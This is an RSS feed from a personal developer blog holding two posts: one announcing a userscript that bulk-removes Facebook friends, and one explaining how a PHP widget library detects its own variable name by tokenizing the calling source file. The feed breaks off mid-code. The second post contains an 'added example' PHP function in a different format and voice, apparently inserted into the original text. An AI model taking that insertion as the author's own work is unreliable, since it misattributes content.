<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>AbiusX</title>
	<atom:link href="http://abiusx.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://abiusx.com</link>
	<description>official website of Abbas Naderi Afooshteh</description>
	<lastBuildDate>Thu, 21 Mar 2013 21:44:43 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Mass Removing Facebook Friends</title>
		<link>http://abiusx.com/mass-removing-facebook-friends/</link>
		<comments>http://abiusx.com/mass-removing-facebook-friends/#comments</comments>
		<pubDate>Thu, 21 Mar 2013 21:44:43 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Bulk removing facebook friends]]></category>
		<category><![CDATA[bulk removing inactive friends in facebook]]></category>
		<category><![CDATA[delete facebook]]></category>
		<category><![CDATA[deleting facebook friends]]></category>
		<category><![CDATA[FacebookDelete]]></category>
		<category><![CDATA[FacebookDeleteX]]></category>
		<category><![CDATA[fast deleting facebook friends]]></category>
		<category><![CDATA[fast remove]]></category>
		<category><![CDATA[fast removing facebook friends]]></category>
		<category><![CDATA[Mass removal of friends on facebook]]></category>
		<category><![CDATA[removing disabled friends]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=859</guid>
		<description><![CDATA[I have Googled around on how to mass remove Facebook friends from time to time. Unfortunately Facebook does not allow that, because it&#8217;s bad for business; but many people are looking for a hack around it. Back in the day, the mobile version had a much easier friend-removal process, but they&#8217;ve made it similar to [...]]]></description>
				<content:encoded><![CDATA[I have Googled around on how to mass remove Facebook friends from time to time. Unfortunately Facebook does not allow that, because it&#8217;s bad for business; but many people are looking for a hack around it. Back in the day, the mobile version had a much easier friend-removal process, but they&#8217;ve made it similar to the desktop version, and very tedious.

The current method of removing a friend involves either going to his/her profile or to your list of friends, hovering over the friend-status button (first request), selecting Unfriend (second request), confirming it (third request), and approving the removal (fourth request). Each of those asynchronous operations has to be done one after another, because the confirmation dialogs take up half of the page; so assuming each one takes half a second, it takes 3 seconds to remove a friend (on a delay-free connection).

Now what if you have 4000 friends (many of them gathering dust) and you want to remove around 3000 of them? Welcome to hell. If you take the manual approach, you&#8217;re bound to drop out midway, because it takes more than 4 hours and drives you nuts.

There are scripts around that usually don&#8217;t work, and are mostly not user-friendly. I decided to filter my friend list today, and when I got to it, I realized it would be much better to spend those 4 hours creating something that others can use as well, instead of doing repetitive work (which is literal hell for developers and hackers). So I made this script:
<p style="text-align: center;"><a title="FacebookDeleteX" href="http://userscripts.org/scripts/show/162656" target="_blank">http://userscripts.org/scripts/show/162656</a></p>
<p style="text-align: left;">It&#8217;s a robust script that runs inside <a href="https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/" target="_blank">GreaseMonkey</a> (for Firefox) or <a href="https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en" target="_blank">TamperMonkey</a> (for Chrome), which are basically environments for running user scripts against different websites. The script does not work on older browsers or on Internet Explorer. I suggest using a fresh Google Chrome, as the script is CPU intensive and Google Chrome is the best for rapid JavaScript evaluation.</p>
<p style="text-align: left;">After installing the script in your Grease environment and enabling it (you should disable it after you&#8217;re done, as it messes with Facebook dialogs), head to your friends edit page (https://facebook.com/friends/edit), and you should see <strong>Fast Remove</strong> buttons next to every active friend&#8217;s picture. Facebook&#8217;s edit-friends page only displays a handful of friends, but scrolling to the bottom adds another handful to the page. You can put some adequately heavy object on your Page Down key, and leave it until all friends are listed.</p>
<p style="text-align: left;">Now the first thing to do is delete all your inactive friends (people who have disabled their Facebook accounts). 90% of them never come back to Facebook, and those who do can go ahead and add you again. From the TamperMonkey (or equivalent) menu, click on the <strong>FacebookDeleteX &#8211; Remove Inactive</strong> submenu. A confirmation box will appear, saying how many inactive friends were found and asking whether you&#8217;re sure you want to delete them all. After clicking yes, all deletions are queued and another dialog gives you some information.</p>
<p style="text-align: left;">At this step, you should wait (or you can start doing the fast removal &#8211; next step). Because each removal requires 4 steps (requests to be made by the script), each one of them takes some time to complete. Closing the page will cancel them. If you&#8217;re removing 1000 inactive friends, you should wait at least 1000&#215;3 seconds (about an hour). You can always check your number of friends before starting this, then check it again in another window and see when it reaches the desired amount (total_number &#8211; inactive_number), then close this window.</p>
<p style="text-align: left;">The final step is manual fast removal of your friends. In this step, you have to click on the <strong>Fast Remove</strong> button next to each person you don&#8217;t want anymore. Don&#8217;t spend too much time deciding whether someone belongs or not, just press Fast Remove. You can easily add them again later.</p>
<p style="text-align: left;">Every time you press Fast Remove, it takes a second or so for the requests to be handled and for the button to disappear (if you&#8217;ve got a lot of requests queued from the previous step, it can take much longer; just click each one once and proceed to the next, or open another window and do this there). Right after that, a dialog box pops up informing you that the friend was removed. The script automatically closes these dialogs once every second.</p>
<p style="text-align: left;">If anything seems not to work with the script, don&#8217;t hesitate to contact me for a fix. Happy facebooking.</p>
<p style="text-align: left;">P.S. This script takes 60% CPU on a MacBook Pro Retina (which is the equivalent of 4 regular PCs).</p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/mass-removing-facebook-friends/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Meta-Reflection variable name detection problem for Pull Widgets in PHP</title>
		<link>http://abiusx.com/meta-reflection-variable-name-detection-problem-for-pull-widgets-in-php/</link>
		<comments>http://abiusx.com/meta-reflection-variable-name-detection-problem-for-pull-widgets-in-php/#comments</comments>
		<pubDate>Tue, 19 Mar 2013 12:36:31 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Software Engineering]]></category>
		<category><![CDATA[code re-use]]></category>
		<category><![CDATA[detect name of php variable]]></category>
		<category><![CDATA[get_defined_vars]]></category>
		<category><![CDATA[how to get php variable as string]]></category>
		<category><![CDATA[introspection]]></category>
		<category><![CDATA[meta-object]]></category>
		<category><![CDATA[meta-object-compiler]]></category>
		<category><![CDATA[meta-object-parser]]></category>
		<category><![CDATA[meta-reflection]]></category>
		<category><![CDATA[obtain variable name in php]]></category>
		<category><![CDATA[variable name as string]]></category>
		<category><![CDATA[variable name detection]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=838</guid>
		<description><![CDATA[First of all, Happy Nowruz! Tomorrow is officially the new Jalali year&#8217;s start. Best of wishes to everyone. The Problem I&#8217;ve been working on an elegant design for a new PHP Widget library for some time now. It is intended to provide a Pull MVC feature for jframework. As you know, MVC provides a separation [...]]]></description>
				<content:encoded><![CDATA[<p>First of all, Happy <a href='https://en.wikipedia.org/wiki/Nowruz'>Nowruz!</a> Tomorrow is officially the new <a href='https://en.wikipedia.org/wiki/Jalali_calendar'>Jalali year</a>&#8217;s start. Best of wishes to everyone.
</p>

<strong>The Problem</strong>
<p>
I&#8217;ve been working on an elegant design for a new PHP widget library for some time now. It is intended to provide a Pull <a href='https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93controller'>MVC</a> feature for jframework. As you know, MVC provides a separation of concerns, allowing people with different expertise to work separately on their designated part of the application. The model part (the business logic of the application, plus some of the solution domain) is usually very reusable and makes heavy use of object orientation. The controller part is mostly lightweight and consists of code that is usually not reusable.
</p><p>
The problem resides in the view part of MVC. Views are mostly HTML/CSS that dump some variables and arrays. Sometimes templates are employed in views to reduce repeated code, but still most of the view code is repeated. Imagine two different areas of a web application, both presenting tabular data of different origin. 70% of their code is the same, but due to the difference in the nature of the data, usually no reuse happens.
</p><p>
I&#8217;m not going to talk about the benefits of code reuse here, but you get the picture.
</p><p>
Pull MVC, in contrast to Push MVC, is a system in which views ask for the content they need to render themselves by pulling it in, instead of having the content pushed directly onto the screen. It is usually provided by widget systems, and is much more object oriented. The problem with Pull systems is that the view is usually designed rather than developed, by a graphic designer who is adept in HTML and CSS.
</p>
<strong>The Actual Thingie</strong>
<p>
The first thing I wanted to do was to preserve maximum simplicity. You cannot expect a library to require redundancy in order to provide code reuse. I do not like libraries that take control of everything and don&#8217;t let developers change their mechanics. So I wanted to replace this practice:
</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$form1</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> jForm<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$form1</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">setName</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;form1&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$form1</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">setMethod</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;post&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$button1</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> jFormButton<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;form1&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$button1</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">setName</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;button1&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$button1</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">setLabel</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;Push Me!&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>



<p>
With a single-line, more elegant approach:
</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$form1</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> jForm<span style="color: #009900;">&#40;</span>jForm<span style="color: #339933;">::</span><span style="color: #004000;">Method_Post</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$button1</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> jFormButton<span style="color: #009900;">&#40;</span><span style="color: #000088;">$form1</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;Push Me!&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>



<p>
So the first thing I needed was for jForm (or any other jWidget instance) to know which variable it is being assigned to &#8211; in this case $form1 &#8211; and name itself after it. The name is actually used a lot in the generated HTML code: for validation, for CSRF protection, for HTML form element names, for HTML IDs, for CSS classes and a lot more.
</p>
<span id="more-838"></span>
<p>
There were two methods proposed around the net. One was to employ the get_defined_vars PHP function to get a list of variables, and then compare them with $this inside the class constructor to find the name. It required you to code like this:
</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$form1</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> jForm<span style="color: #009900;">&#40;</span><span style="color: #990000;">get_defined_vars</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></td></tr></table></div>



<p>
This works because get_defined_vars returns the list of variables defined in the scope it is called from. Not very elegant, but still worth a shot if it worked. There are two problems with this approach: first, every variable with an equal value (though not the same variable) is matched, and second, something that I&#8217;ll describe later.
</p><p>
The other approach was to call get_defined_vars, change the variable, and call get_defined_vars again, comparing the two results to find our variable. Unfortunately $this cannot be changed.
</p><p>
The second problem, rendering both methods perfectly useless, was that $form1 is <strong>not</strong> defined at the point the constructor is called, because first the right-hand side of the assignment is evaluated &#8211; thus calling the constructor &#8211; and only then is the left-hand side assigned.
</p>
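<p>
An added example, not jframework&#8217;s own ParseName: a stand-alone PHP function that performs the token walk the solution below relies on, applied to a constructed source string instead of the file that debug_backtrace() would point at. The function name findAssignedVariable and the sample source are assumptions; the sample also includes the failure mode the library has to reject, an instantiation that is not the right-hand side of an assignment.
</p>

```php
<?php
// Added example (not jframework's ParseName); PHP 7.1+ assumed.
// Given PHP source text, find the variable that the $occurrence-th
// "new $className" expression is assigned to, using token_get_all().

/**
 * Returns the variable name (without '$') assigned from the
 * $occurrence-th "new $className" in $source, or throws if that
 * instantiation is not the right-hand side of a plain assignment.
 */
function findAssignedVariable(string $source, string $className, int $occurrence): string
{
    $tokens = token_get_all($source);
    $count  = count($tokens);
    $seen   = 0;

    // Token kinds that can carry a class name right after "new".
    $nameKinds = [T_STRING];
    if (defined('T_NAME_QUALIFIED')) {      // PHP 8 tokenizes Foo\Bar as one token
        $nameKinds[] = T_NAME_QUALIFIED;
    }

    for ($i = 0; $i < $count; $i++) {
        if (!is_array($tokens[$i]) || $tokens[$i][0] !== T_NEW) {
            continue;                        // "new" inside comments/strings never tokenizes as T_NEW
        }
        // Step forward over whitespace to reach the class name.
        $j = $i + 1;
        while ($j < $count && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j >= $count || !is_array($tokens[$j]) || !in_array($tokens[$j][0], $nameKinds, true)
            || strcasecmp($tokens[$j][1], $className) !== 0) {
            continue;                        // "new" of some other class (class names are case-insensitive)
        }
        if (++$seen !== $occurrence) {
            continue;                        // not yet the instantiation we are looking for
        }
        // Step back over whitespace before "new": the previous token must be "=".
        $k = $i - 1;
        while ($k >= 0 && is_array($tokens[$k]) && $tokens[$k][0] === T_WHITESPACE) {
            $k--;
        }
        if ($k < 0 || $tokens[$k] !== '=') { // single-character tokens are plain strings
            throw new RuntimeException("new {$className} is not assigned to a variable");
        }
        // Step back once more to the variable being assigned.
        $k--;
        while ($k >= 0 && is_array($tokens[$k]) && $tokens[$k][0] === T_WHITESPACE) {
            $k--;
        }
        if ($k < 0 || !is_array($tokens[$k]) || $tokens[$k][0] !== T_VARIABLE) {
            throw new RuntimeException("left-hand side of new {$className} is not a plain variable");
        }
        return substr($tokens[$k][1], 1);    // strip the leading '$'
    }
    throw new RuntimeException("occurrence {$occurrence} of new {$className} not found");
}

// Constructed sample source, standing in for the caller's file.
$sample = <<<'PHP'
<?php
$form1 = new jForm(jForm::Method_Post);
$button1 = new jFormButton($form1, "Push Me!");
$form2   =   new   jForm();
echo new jForm();   // not assigned: the library must reject this one
PHP;

foreach ([['jForm', 1], ['jFormButton', 1], ['jForm', 2], ['jForm', 3]] as [$cls, $n]) {
    try {
        printf("%s #%d -> \$%s\n", $cls, $n, findAssignedVariable($sample, $cls, $n));
    } catch (RuntimeException $e) {
        printf("%s #%d -> rejected: %s\n", $cls, $n, $e->getMessage());
    }
}
```

The same walk applied to the file and occurrence count taken from debug_backtrace() is what lets a widget name itself before the assignment has completed.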

<strong>The Solution</strong>
<p>
I would not let go of my desired design, as I was aware that an inconvenient library would simply not be used at all. I will post my solution first, and then describe it. The posted solution is the ParseName method of the jWidget class, the base class for all other widgets, which is used to detect their variable names:
</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">private</span> <span style="color: #000000; font-weight: bold;">function</span> ParseName<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span>
<span style="color: #009900;">&#123;</span>
	<span style="color: #666666; font-style: italic;">//first lets find the file who created the widget</span>
	<span style="color: #000088;">$backtrace</span> <span style="color: #339933;">=</span> <span style="color: #990000;">debug_backtrace</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #000088;">$backtraceIndex</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span>
	<span style="color: #666666; font-style: italic;">//step over all subclasses of jWidget, who called parent constructor to get the name done. Also other methods of this class</span>
	<span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">isset</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$backtrace</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$backtraceIndex</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'class'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span><span style="color: #990000;">is_a</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$backtrace</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$backtraceIndex</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'class'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">,</span><span style="color: #0000ff;">&quot;jWidget&quot;</span><span style="color: #339933;">,</span><span style="color: #009900; font-weight: bold;">true</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #000088;">$backtraceIndex</span><span style="color: #339933;">++;</span>
	<span style="color: #000088;">$backtraceIndex</span><span style="color: #339933;">--;</span>
	<span style="color: #000088;">$file</span><span style="color: #339933;">=</span><span style="color: #000088;">$backtrace</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$backtraceIndex</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
	<span style="color: #000088;">$line</span><span style="color: #339933;">=</span><span style="color: #000088;">$backtrace</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$backtraceIndex</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'line'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//used in error messages</span>
&nbsp;
&nbsp;
	<span style="color: #000088;">$classname</span><span style="color: #339933;">=</span><span style="color: #990000;">get_class</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">isset</span><span style="color: #009900;">&#40;</span><span style="color: #000000; font-weight: bold;">self</span><span style="color: #339933;">::</span><span style="color: #000088;">$classInstanceCountPerFile</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$file</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> and <span style="color: #990000;">isset</span><span style="color: #009900;">&#40;</span><span style="color: #000000; font-weight: bold;">self</span><span style="color: #339933;">::</span><span style="color: #000088;">$classInstanceCountPerFile</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$file</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$classname</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> 
	<span style="color: #666666; font-style: italic;">//this widget was already instantiated in this file; increase the count and look for the x-th occurrence</span>
		<span style="color: #000000; font-weight: bold;">self</span><span style="color: #339933;">::</span><span style="color: #000088;">$classInstanceCountPerFile</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$file</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$classname</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">++;</span>
	<span style="color: #b1b100;">else</span>
		<span style="color: #000000; font-weight: bold;">self</span><span style="color: #339933;">::</span><span style="color: #000088;">$classInstanceCountPerFile</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$file</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$classname</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #000088;">$desiredCount</span><span style="color: #339933;">=</span><span style="color: #000000; font-weight: bold;">self</span><span style="color: #339933;">::</span><span style="color: #000088;">$classInstanceCountPerFile</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$file</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$classname</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
	<span style="color: #000088;">$currentCount</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #000088;">$php_code</span> <span style="color: #339933;">=</span> <span style="color: #990000;">file_get_contents</span> <span style="color: #009900;">&#40;</span> <span style="color: #000088;">$file</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #000088;">$tokens</span> <span style="color: #339933;">=</span> <span style="color: #990000;">token_get_all</span> <span style="color: #009900;">&#40;</span> <span style="color: #000088;">$php_code</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
	<span style="color: #000088;">$count</span> <span style="color: #339933;">=</span> <span style="color: #990000;">count</span> <span style="color: #009900;">&#40;</span> <span style="color: #000088;">$tokens</span> <span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #b1b100;">for</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$i</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">0</span><span style="color: #339933;">;</span> <span style="color: #000088;">$i</span> <span style="color: #339933;">&lt;</span> <span style="color: #000088;">$count</span><span style="color: #339933;">;</span> <span style="color: #000088;">$i</span> <span style="color: #339933;">++</span><span style="color: #009900;">&#41;</span>
	<span style="color: #009900;">&#123;</span>
		<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$tokens</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$i</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">0</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">===</span>T_NEW<span style="color: #009900;">&#41;</span> <span style="color: #666666; font-style: italic;">//found the &quot;new&quot; keyword</span>
		<span style="color: #009900;">&#123;</span>
			<span style="color: #666666; font-style: italic;">//go forth until you find the classname</span>
			<span style="color: #000088;">$j</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">;</span>
			<span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$tokens</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$i</span><span style="color: #339933;">+</span><span style="color: #000088;">$j</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">0</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">==</span>T_WHITESPACE<span style="color: #009900;">&#41;</span> <span style="color: #000088;">$j</span><span style="color: #339933;">++;</span>
			<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$tokens</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$i</span><span style="color: #339933;">+</span><span style="color: #000088;">$j</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">==</span><span style="color: #000088;">$classname</span><span style="color: #009900;">&#41;</span> <span style="color: #666666; font-style: italic;">//if desired class found, increase count until we reach our desired index</span>
				<span style="color: #000088;">$currentCount</span><span style="color: #339933;">++;</span>
			<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$currentCount</span><span style="color: #339933;">==</span><span style="color: #000088;">$desiredCount</span><span style="color: #009900;">&#41;</span> <span style="color: #666666; font-style: italic;">//found the line with our variable name: the occurrence reached the desired count</span>
			<span style="color: #009900;">&#123;</span>
&nbsp;
				<span style="color: #666666; font-style: italic;">//go back until you find the assignment sign</span>
				<span style="color: #000088;">$j</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">;</span>
				<span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$tokens</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$i</span><span style="color: #339933;">-</span><span style="color: #000088;">$j</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">0</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">==</span>T_WHITESPACE<span style="color: #009900;">&#41;</span> <span style="color: #000088;">$j</span><span style="color: #339933;">++;</span>
				<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$tokens</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$i</span><span style="color: #339933;">-</span><span style="color: #000088;">$j</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">!=</span><span style="color: #0000ff;">&quot;=&quot;</span><span style="color: #009900;">&#41;</span>
				<span style="color: #009900;">&#123;</span>
					<span style="color: #b1b100;">throw</span> <span style="color: #000000; font-weight: bold;">new</span> Exception<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;You should instantiate jWidget by assigning it to a variable, e.g <span style="color: #000099; font-weight: bold;">\$</span>someWidget=new jWidget(<span style="color: #000099; font-weight: bold;">\$</span>this);
							in file <span style="color: #006699; font-weight: bold;">{$file}</span> line <span style="color: #006699; font-weight: bold;">{$line}</span> &quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
				<span style="color: #009900;">&#125;</span>
				<span style="color: #666666; font-style: italic;">//go further back until you find the variable name</span>
				<span style="color: #000088;">$j</span><span style="color: #339933;">++;</span>
				<span style="color: #b1b100;">while</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$tokens</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$i</span><span style="color: #339933;">-</span><span style="color: #000088;">$j</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">0</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">==</span>T_WHITESPACE<span style="color: #009900;">&#41;</span> <span style="color: #000088;">$j</span><span style="color: #339933;">++;</span>
				<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$tokens</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$i</span><span style="color: #339933;">-</span><span style="color: #000088;">$j</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">0</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">!=</span>T_VARIABLE<span style="color: #009900;">&#41;</span>
				<span style="color: #009900;">&#123;</span>
					<span style="color: #b1b100;">throw</span> <span style="color: #000000; font-weight: bold;">new</span> Exception<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;Could not find variable: You should instantiate jWidget by assigning it to a variable, e.g <span style="color: #000099; font-weight: bold;">\$</span>someWidget=new jWidget(<span style="color: #000099; font-weight: bold;">\$</span>this);
							in file <span style="color: #006699; font-weight: bold;">{$file}</span> line <span style="color: #006699; font-weight: bold;">{$line}</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
				<span style="color: #009900;">&#125;</span>
				<span style="color: #000088;">$variableName</span><span style="color: #339933;">=</span><span style="color: #000088;">$tokens</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$i</span><span style="color: #339933;">-</span><span style="color: #000088;">$j</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span>
				<span style="color: #000088;">$variableName</span><span style="color: #339933;">=</span><span style="color: #990000;">substr</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$variableName</span><span style="color: #339933;">,</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//remove the $ sign</span>
				<span style="color: #666666; font-style: italic;">//check if this name already used on another widget</span>
				<span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">isset</span><span style="color: #009900;">&#40;</span><span style="color: #000000; font-weight: bold;">self</span><span style="color: #339933;">::</span><span style="color: #000088;">$widgetInfo</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$variableName</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span>
					<span style="color: #b1b100;">throw</span> <span style="color: #000000; font-weight: bold;">new</span> Exception<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;Name used for widget object at <span style="color: #006699; font-weight: bold;">{$file}</span>:<span style="color: #006699; font-weight: bold;">{$line}</span> already used for another widget at &quot;</span><span style="color: #339933;">.</span>
